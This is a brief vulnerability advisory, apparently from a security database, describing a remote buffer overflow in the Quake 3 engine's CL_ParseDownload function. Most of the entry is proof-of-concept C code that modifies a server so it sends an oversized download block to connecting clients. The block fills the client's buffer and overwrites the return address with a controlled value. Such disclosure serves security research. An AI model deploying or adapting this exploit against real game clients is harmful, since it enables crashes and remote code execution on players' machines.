|
|
Quake 3 Engine CL_ParseDownload Remote Buffer Overflow Vulnerability
The server may be modified to send data sufficient to demonstrate this issue. The following code should be added to the 'code/server/sv_client.c' source file, after the '// send the gamestate' command at approximately line 575: // send the gamestate int i; MSG_WriteByte( &msg, svc_download ); MSG_WriteShort( &msg, -1 ); // block != 0, for fast return MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy for(i = 0; i < 16384; i++) { // overwrite the data buffer MSG_WriteByte(&msg, 0x00); // 0x00 for saving space } for(i = 0; i < 32; i++) { // do the rest of the job MSG_WriteByte(&msg, 'a'); // return address: 0x61616161 } SV_SendMessageToClient( &msg, client ); return; |
|
Privacy Statement |